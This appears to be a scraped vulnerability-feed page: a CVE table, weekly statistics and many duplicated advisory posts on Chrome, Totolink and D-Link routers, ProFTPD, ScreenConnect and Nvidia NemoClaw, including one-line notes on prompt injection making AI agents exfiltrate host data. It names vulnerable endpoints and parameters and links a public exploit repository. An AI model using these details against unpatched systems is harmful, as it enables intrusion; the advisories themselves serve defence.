| CVE-2026-32062 | 7.5 | 0.14% | 1 | 0 | 2026-03-11T20:38:31 | ### Summary `@openclaw/voice-call` (and the bundled copy shipped in `openclaw`) | |
| CVE-2026-2526 | 6.3 | 0.38% | 1 | 0 | 2026-02-18T21:31:21 | A vulnerability was found in Wavlink WL-WN579A3 up to 20210219. This impacts the | |
| CVE-2026-21509 | 7.8 | 10.86% | 1 | 12 | 2026-02-11T15:40:33.473000 | Reliance on untrusted inputs in a security decision in Microsoft Office allows a | |
| CVE-2025-12383 | None | 0.04% | 2 | 0 | 2026-02-05T15:43:37 | In Eclipse Jersey versions 2.45, 3.0.16, 3.1.9 a race condition can cause ignori | |
| CVE-2025-68161 | 4.8 | 0.03% | 2 | 0 | 2026-01-20T01:15:55.067000 | The Socket Appender in Apache Log4j Core versions 2.0-beta9 through 2.25.2 does | |
| CVE-2025-68705 | None | 0.04% | 2 | 1 | 2026-01-07T21:34:38 | # RustFS Path Traversal Vulnerability ## Vulnerability Details - **CVE ID**: | |
| CVE-2025-59250 | 8.1 | 0.08% | 2 | 0 | 2025-11-24T17:38:57 | Improper input validation in JDBC Driver for SQL Server allows an unauthorized a | |
| CVE-2025-20362 | 6.5 | 43.64% | 1 | 0 | template | 2025-11-06T14:51:19.950000 | Update: On November 5, 2025, Cisco became aware of a new attack variant against |
| CVE-2025-48924 | 5.3 | 0.04% | 2 | 1 | 2025-11-04T22:16:17.823000 | Uncontrolled Recursion vulnerability in Apache Commons Lang. This issue affects | |
| CVE-2025-20333 | 9.9 | 24.78% | 1 | 0 | 2025-10-28T13:58:58.610000 | A vulnerability in the VPN web server of Cisco Secure Firewall Adaptive Security | |
| CVE-2025-59536 | 8.8 | 0.03% | 2 | 4 | 2025-10-23T12:46:37.910000 | Claude Code is an agentic coding tool. Versions before 1.0.111 were vulnerable t | |
| CVE-2024-21413 | 9.8 | 92.99% | 1 | 35 | 2025-10-22T00:33:00 | Microsoft Outlook Remote Code Execution Vulnerability | |
| CVE-2025-54136 | 7.2 | 0.11% | 2 | 1 | 2025-08-25T01:41:36.580000 | Cursor is a code editor built for programming with AI. In versions 1.2.4 and bel | |
| CVE-2025-27636 | 5.6 | 35.52% | 1 | 3 | 2025-06-23T18:54:52.400000 | Bypass/Injection vulnerability in Apache Camel components under particular condi | |
| CVE-2024-52046 | 9.8 | 80.14% | 1 | 0 | 2025-02-11T19:03:55 | The `ObjectSerializationDecoder` in Apache MINA uses Java’s native deserializati | |
| CVE-2022-24138 | 7.8 | 0.28% | 1 | 0 | 2024-11-21T06:49:53.140000 | IOBit Advanced System Care (Asc.exe) 15 and Action Download Center both download | |
| CVE-2026-42208 | 0 | 0.00% | 2 | 1 | N/A | ||
| CVE-2026-25262 | 0 | 0.00% | 1 | 0 | N/A |
updated 2026-04-29T01:00:01.613000
1 posts
📈 CVE Published in last 7 days (2026-04-20 - 2026-04-27)
See more at https://secdb.nttzen.cloud/dashboard
Total CVEs: 1459
Severity:
- Critical: 124
- High: 358
- Medium: 586
- Low: 70
- None: 321
Status:
- : 40
- Analyzed: 313
- Awaiting Analysis: 570
- Deferred: 238
- Modified: 9
- Received: 124
- Rejected: 23
- Undergoing Analysis: 142
Top CNAs:
- GitHub, Inc.: 326
- kernel.org: 257
- VulnCheck: 119
- VulDB: 114
- Oracle: 102
- MITRE: 69
- Wordfence: 67
- Canonical Ltd.: 46
- Mozilla Corporation: 42
- N/A: 40
Top Affected Products:
- UNKNOWN: 1040
- Openclaw: 42
- Mozilla Firefox: 39
- Mozilla Thunderbird: 38
- Oracle Mysql Server: 25
- Wwbn Avideo: 18
- Flowiseai Flowise: 18
- Uutils Coreutils: 14
- Silextechnology Sd-330ac Firmware: 11
- Gitlab: 11
Top EPSS Score:
- CVE-2026-5965 - 6.34 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-5965)
- CVE-2026-41179 - 5.98 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-41179)
- CVE-2026-40887 - 4.56 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-40887)
- CVE-2026-38834 - 3.22 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-38834)
- CVE-2026-41176 - 2.79 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-41176)
- CVE-2026-21571 - 1.10 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21571)
- CVE-2026-6799 - 1.06 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-6799)
- CVE-2026-24467 - 0.76 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-24467)
- CVE-2026-41472 - 0.67 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-41472)
- CVE-2019-25714 - 0.60 % (https://secdb.nttzen.cloud/cve/detail/CVE-2019-25714)
updated 2026-04-28T23:16:21.987000
2 posts
CRITICAL: Chrome <147.0.7727.138 on Windows is vulnerable to a use-after-free in Accessibility (CVE-2026-7344). Allows sandbox escape after renderer compromise. Patch now to mitigate risk. https://radar.offseq.com/threat/cve-2026-7344-use-after-free-in-google-chrome-1aabf4b9 #OffSeq #Chrome #Vuln #Cybersecurity
##CRITICAL: Chrome <147.0.7727.138 on Windows is vulnerable to a use-after-free in Accessibility (CVE-2026-7344). Allows sandbox escape after renderer compromise. Patch now to mitigate risk. https://radar.offseq.com/threat/cve-2026-7344-use-after-free-in-google-chrome-1aabf4b9 #OffSeq #Chrome #Vuln #Cybersecurity
##updated 2026-04-28T23:16:21.883000
2 posts
⚠️ CRITICAL: CVE-2026-7343 in Chrome (Windows <147.0.7727.138) is a use-after-free in Views that could allow renderer sandbox escape. Patch ASAP to mitigate. No known exploits yet. https://radar.offseq.com/threat/cve-2026-7343-use-after-free-in-google-chrome-6725c92f #OffSeq #Chrome #Vulnerability #Security
##⚠️ CRITICAL: CVE-2026-7343 in Chrome (Windows <147.0.7727.138) is a use-after-free in Views that could allow renderer sandbox escape. Patch ASAP to mitigate. No known exploits yet. https://radar.offseq.com/threat/cve-2026-7343-use-after-free-in-google-chrome-6725c92f #OffSeq #Chrome #Vulnerability #Security
##updated 2026-04-28T23:16:20.610000
2 posts
1 repos
🟠 CVE-2026-42167 - High (8.1)
mod_sql in ProFTPD before 1.3.10rc1 allows remote attackers to execute arbitrary code via a username, in scenarios where there is logging of USER requests with an expansion such as %U, and the SQL backend allows commands (e.g., COPY TO PROGRAM).
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-42167/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-42167 - High (8.1)
mod_sql in ProFTPD before 1.3.10rc1 allows remote attackers to execute arbitrary code via a username, in scenarios where there is logging of USER requests with an expansion such as %U, and the SQL backend allows commands (e.g., COPY TO PROGRAM).
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-42167/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T22:16:49.900000
2 posts
🔴 CVE-2026-41873 - Critical (9.8)
** UNSUPPORTED WHEN ASSIGNED ** Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') vulnerability in Pony Mail leading to admin account takeover.
This issue affects all versions of the Lua implementation of Pony Mail....
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41873/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-41873 - Critical (9.8)
** UNSUPPORTED WHEN ASSIGNED ** Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') vulnerability in Pony Mail leading to admin account takeover.
This issue affects all versions of the Lua implementation of Pony Mail....
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41873/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T22:16:49.747000
2 posts
🟠 CVE-2026-41649 - High (7.7)
Outline is a service that allows for collaborative documentation. The `shares.create` API endpoint starting in version 0.86.0 and prior to version 1.7.0 has an insecure direct object reference.. When both `collectionId` and `documentId` are provid...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41649/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-41649 - High (7.7)
Outline is a service that allows for collaborative documentation. The `shares.create` API endpoint starting in version 0.86.0 and prior to version 1.7.0 has an insecure direct object reference.. When both `collectionId` and `documentId` are provid...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41649/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T21:37:12
2 posts
🟠 CVE-2026-38651 - High (8.2)
Authentication Bypass vulnerability exists in Netmaker versions prior to 1.5.0. The VerifyHostToken function in logic/jwts.go fails to validate the JWT signature when verifying host tokens. An attacker can forge a JWT signed with any arbitrary key...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-38651/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-38651 - High (8.2)
Authentication Bypass vulnerability exists in Netmaker versions prior to 1.5.0. The VerifyHostToken function in logic/jwts.go fails to validate the JWT signature when verifying host tokens. An attacker can forge a JWT signed with any arbitrary key...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-38651/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T21:37:03
8 posts
🚨 [CISA-2026:0428] CISA Adds 2 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0428)
CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2024-1708 (https://secdb.nttzen.cloud/cve/detail/CVE-2024-1708)
- Name: ConnectWise ScreenConnect Path Traversal Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: ConnectWise
- Product: ScreenConnect
- Notes: https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8 ; https://nvd.nist.gov/vuln/detail/CVE-2024-1708
⚠️ CVE-2026-32202 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-32202)
- Name: Microsoft Windows Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-32202 ; https://nvd.nist.gov/vuln/detail/CVE-2026-32202
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260428 #cisa20260428 #cve_2024_1708 #cve_2026_32202 #cve20241708 #cve202632202
##🛡️ Title: Windows Shell Spoofing Vulnerability
Description
🛡️ Protection mechanism failure in Windows Shell allows an unauthorized attacker to perform spoofing over a network.
##CVE ID: CVE-2026-32202
Vendor: Microsoft
Product: Windows
Date Added: 2026-04-28
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-32202
🚨 [CISA-2026:0428] CISA Adds 2 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0428)
CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2024-1708 (https://secdb.nttzen.cloud/cve/detail/CVE-2024-1708)
- Name: ConnectWise ScreenConnect Path Traversal Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: ConnectWise
- Product: ScreenConnect
- Notes: https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8 ; https://nvd.nist.gov/vuln/detail/CVE-2024-1708
⚠️ CVE-2026-32202 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-32202)
- Name: Microsoft Windows Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-32202 ; https://nvd.nist.gov/vuln/detail/CVE-2026-32202
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260428 #cisa20260428 #cve_2024_1708 #cve_2026_32202 #cve20241708 #cve202632202
##🛡️ Title: Windows Shell Spoofing Vulnerability
Description
🛡️ Protection mechanism failure in Windows Shell allows an unauthorized attacker to perform spoofing over a network.
##CVE ID: CVE-2026-32202
Vendor: Microsoft
Product: Windows
Date Added: 2026-04-28
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-32202
Microsoft Confirms Active Exploitation of Windows Shell CVE-2026-32202
https://thehackernews.com/2026/04/microsoft-confirms-active-exploitation.html
Read on HackerWorkspace: https://hackerworkspace.com/article/microsoft-confirms-active-exploitation-of-windows-shell-cve-2026-32202
##A Shortcut to Coercion: Incomplete Patch of APT28's Zero-Day Leads to CVE-2026-32202
#CVE_2026_32202 #APT28 #CVE_2026_21510
https://www.akamai.com/blog/security-research/2026/apr/incomplete-patch-apt28s-zero-day-cve-2026-32202
updated 2026-04-28T21:36:23
4 posts
🟠 CVE-2026-24222 - High (8.6)
NVIDIA NeMoClaw contains a vulnerability in the sandbox environment initialization component, where a remote attacker could cause improper access control by sending prompt-injected content that causes the agent to read and exfiltrate host environm...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24222/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##Nvidia has posted two advisories:
"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."
- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 https://nvidia.custhelp.com/app/answers/detail/a_id/5819
"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."
- High: CVE-2026-24222 and CVE-2026-24231: https://nvidia.custhelp.com/app/answers/detail/a_id/5837 #Nvidia #infoec #vulnerability
##🟠 CVE-2026-24222 - High (8.6)
NVIDIA NeMoClaw contains a vulnerability in the sandbox environment initialization component, where a remote attacker could cause improper access control by sending prompt-injected content that causes the agent to read and exfiltrate host environm...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24222/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##Nvidia has posted two advisories:
"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."
- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 https://nvidia.custhelp.com/app/answers/detail/a_id/5819
"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."
- High: CVE-2026-24222 and CVE-2026-24231: https://nvidia.custhelp.com/app/answers/detail/a_id/5837 #Nvidia #infoec #vulnerability
##updated 2026-04-28T21:36:22
2 posts
Nvidia has posted two advisories:
"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."
- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 https://nvidia.custhelp.com/app/answers/detail/a_id/5819
"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."
- High: CVE-2026-24222 and CVE-2026-24231: https://nvidia.custhelp.com/app/answers/detail/a_id/5837 #Nvidia #infoec #vulnerability
##Nvidia has posted two advisories:
"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."
- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 https://nvidia.custhelp.com/app/answers/detail/a_id/5819
"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."
- High: CVE-2026-24222 and CVE-2026-24231: https://nvidia.custhelp.com/app/answers/detail/a_id/5837 #Nvidia #infoec #vulnerability
##updated 2026-04-28T21:34:00
4 posts
3 repos
https://github.com/Teexo/ScreenConnect-CVE-2024-1709-Exploit
🚨 [CISA-2026:0428] CISA Adds 2 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0428)
CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2024-1708 (https://secdb.nttzen.cloud/cve/detail/CVE-2024-1708)
- Name: ConnectWise ScreenConnect Path Traversal Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: ConnectWise
- Product: ScreenConnect
- Notes: https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8 ; https://nvd.nist.gov/vuln/detail/CVE-2024-1708
⚠️ CVE-2026-32202 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-32202)
- Name: Microsoft Windows Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-32202 ; https://nvd.nist.gov/vuln/detail/CVE-2026-32202
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260428 #cisa20260428 #cve_2024_1708 #cve_2026_32202 #cve20241708 #cve202632202
##CVE ID: CVE-2024-1708
Vendor: ConnectWise
Product: ScreenConnect
Date Added: 2026-04-28
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2024-1708
🚨 [CISA-2026:0428] CISA Adds 2 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0428)
CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2024-1708 (https://secdb.nttzen.cloud/cve/detail/CVE-2024-1708)
- Name: ConnectWise ScreenConnect Path Traversal Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: ConnectWise
- Product: ScreenConnect
- Notes: https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8 ; https://nvd.nist.gov/vuln/detail/CVE-2024-1708
⚠️ CVE-2026-32202 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-32202)
- Name: Microsoft Windows Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-32202 ; https://nvd.nist.gov/vuln/detail/CVE-2026-32202
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260428 #cisa20260428 #cve_2024_1708 #cve_2026_32202 #cve20241708 #cve202632202
##CVE ID: CVE-2024-1708
Vendor: ConnectWise
Product: ScreenConnect
Date Added: 2026-04-28
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2024-1708
updated 2026-04-28T20:25:44.987000
2 posts
🟠 CVE-2026-7289 - High (8.8)
A vulnerability was found in D-Link DIR-825M 1.1.12. This issue affects the function sub_414BA8 of the file /boafrm/formWanConfigSetup. The manipulation of the argument submit-url results in buffer overflow. The attack can be executed remotely. Th...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7289/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-7289 - High (8.8)
A vulnerability was found in D-Link DIR-825M 1.1.12. This issue affects the function sub_414BA8 of the file /boafrm/formWanConfigSetup. The manipulation of the argument submit-url results in buffer overflow. The attack can be executed remotely. Th...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7289/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T20:25:44.987000
2 posts
🟠 CVE-2026-7288 - High (8.8)
A vulnerability has been found in D-Link DIR-825M 1.1.12. This vulnerability affects the function sub_4151FC of the file /boafrm/formVpnConfigSetup. The manipulation of the argument submit-url leads to buffer overflow. Remote exploitation of the a...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7288/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-7288 - High (8.8)
A vulnerability has been found in D-Link DIR-825M 1.1.12. This vulnerability affects the function sub_4151FC of the file /boafrm/formVpnConfigSetup. The manipulation of the argument submit-url leads to buffer overflow. Remote exploitation of the a...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7288/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T20:24:58.820000
3 posts
🚨 CRITICAL: Totolink A8000RU (7.1cu.643_b20200521) affected by CVE-2026-7204 — remote OS command injection in CGI handler. No patch yet. Restrict access & monitor for updates. Public exploit disclosed. https://radar.offseq.com/threat/cve-2026-7204-os-command-injection-in-totolink-a80-304b8a45 #OffSeq #Vulnerability #IoTSecurity #CVE20267204
##🔴 CVE-2026-7204 - Critical (9.8)
A vulnerability was determined in Totolink A8000RU 7.1cu.643_b20200521. This issue affects the function setPptpServerCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. This manipulation of the argument enable causes os command inje...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7204/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🚨 CRITICAL: Totolink A8000RU routers (7.1cu.643_b20200521) vulnerable to remote, unauthenticated OS command injection (CVE-2026-7204). No patch yet. Restrict access & monitor vendor channels. https://radar.offseq.com/threat/cve-2026-7204-os-command-injection-in-totolink-a80-304b8a45 #OffSeq #Vuln #RouterSecurity #CVE20267204
##updated 2026-04-28T20:24:58.820000
2 posts
💥 CVE-2026-7155: CRITICAL OS command injection in Totolink A8000RU (7.1cu.643_b20200521). Exploitable remotely, no auth needed. Disable remote mgmt & restrict access until patch. Details: https://radar.offseq.com/threat/cve-2026-7155-os-command-injection-in-totolink-a80-1189da9b #OffSeq #Vulnerability #CVE2026_7155 #IoTSecurity
##🔴 CVE-2026-7155 - Critical (9.8)
A security vulnerability has been detected in Totolink A8000RU 7.1cu.643_b20200521. This impacts the function setLoginPasswordCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument admpass leads to os c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7155/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T20:24:58.820000
1 posts
🔴 CVE-2026-7154 - Critical (9.8)
A weakness has been identified in Totolink A8000RU 7.1cu.643_b20200521. This affects the function setAdvancedInfoShow of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Executing a manipulation of the argument tty_server can lead to os...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7154/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T20:24:20.377000
1 posts
Totolink A8000RU (v7.1cu.643_b20200521) faces CRITICAL OS command injection (CVE-2026-7244, CVSS 9.3). Remote, unauthenticated exploit possible. No patch yet — restrict mgmt access & monitor for updates. https://radar.offseq.com/threat/cve-2026-7244-os-command-injection-in-totolink-a80-f82a0e92 #OffSeq #Vuln #RouterSecurity #CVE2026_7244
##updated 2026-04-28T20:24:20.377000
1 posts
🚨 CRITICAL OS command injection in Totolink A8000RU (7.1cu.643_b20200521) via setVpnAccountCfg lets remote attackers run arbitrary commands. No patch yet; restrict device access & monitor closely. CVE-2026-7240 https://radar.offseq.com/threat/cve-2026-7240-os-command-injection-in-totolink-a80-cd808cb1 #OffSeq #CVE20267240 #infosec
##updated 2026-04-28T20:23:20.703000
2 posts
🟠 CVE-2026-3323 - High (7.5)
An unsecured configuration interface on affected devices allows unauthenticated remote attackers to access sensitive information, including hashed credentials and access codes.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-3323/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-3323 - High (7.5)
An unsecured configuration interface on affected devices allows unauthenticated remote attackers to access sensitive information, including hashed credentials and access codes.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-3323/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T20:23:20.703000
2 posts
🟠 CVE-2026-5944 - High (8.2)
An improper access control vulnerability exists in the Cisco Intersight Device Connector for Nutanix Prism Central. The service exposes an API passthrough endpoint on TCP port 7373 that is accessible within the network scope of the deployment envi...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-5944/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-5944 - High (8.2)
An improper access control vulnerability exists in the Cisco Intersight Device Connector for Nutanix Prism Central. The service exposes an API passthrough endpoint on TCP port 7373 that is accessible within the network scope of the deployment envi...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-5944/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T20:22:38.260000
2 posts
🟠 CVE-2026-7279 - High (7.8)
AVACAST developed by eMPIA Technology, has a DLL Hijacking vulnerability, allowing authenticated local attackers to place a malicious DLL in a specific directory, resulting in arbitrary code execution with system privileges when the system loads t...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7279/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-7279 - High (7.8)
AVACAST developed by eMPIA Technology, has a DLL Hijacking vulnerability, allowing authenticated local attackers to place a malicious DLL in a specific directory, resulting in arbitrary code execution with system privileges when the system loads t...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7279/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T20:18:13.020000
2 posts
1 repos
🟠 CVE-2025-67223 - High (7.5)
The Aranda File Server (AFS) component in Aranda Software Aranda Service Desk before 8.3.12 stores daily activity logs with predictable names in a publicly accessible directory, which allows unauthenticated remote attackers to obtain direct virtua...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-67223/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-67223 - High (7.5)
The Aranda File Server (AFS) component in Aranda Software Aranda Service Desk before 8.3.12 stores daily activity logs with predictable names in a publicly accessible directory, which allows unauthenticated remote attackers to obtain direct virtua...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-67223/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T20:18:13.020000
2 posts
🟠 CVE-2026-27760 - High (8.1)
OpenCATS prior to commit 3002a29 contains a PHP code injection vulnerability in the installer AJAX endpoint that allows unauthenticated attackers to execute arbitrary code by injecting PHP statements into the databaseConnectivity action parameter....
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-27760/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-27760 - High (8.1)
OpenCATS prior to commit 3002a29 contains a PHP code injection vulnerability in the installer AJAX endpoint that allows unauthenticated attackers to execute arbitrary code by injecting PHP statements into the databaseConnectivity action parameter....
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-27760/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T20:11:56.713000
2 posts
CVE-2026-32644 (CRITICAL, CVSS 9.2): Milesight MS-Cxx63-PD cameras have default SSL private keys, exposing encrypted traffic to interception & tampering. No patch yet — restrict access & follow vendor updates. https://radar.offseq.com/threat/cve-2026-32644-cwe-321-in-milesight-ms-cxx63-pd-60e79b90 #OffSeq #IoTSecurity #Vulnerability
##🔴 CVE-2026-32644 - Critical (9.8)
Specific firmware versions of Milesight AIOT cameras use SSL certificates with default private keys.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-32644/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T20:11:56.713000
1 posts
🟠 CVE-2026-20766 - High (8.8)
An out-of-bounds memory access vulnerability exists in specific firmware versions of Milesight AIOT cameras.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-20766/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T20:11:56.713000
1 posts
🟠 CVE-2026-40972 - High (7.5)
An attacker on the same network as the remote application may be able to utilize a timing attack to discover information about the remote secret. In extreme circumstances this could result in the attacker determining the secret and uploading chang...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-40972/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T20:10:59.913000
2 posts
🔴 CVE-2026-7321 - Critical (9.6)
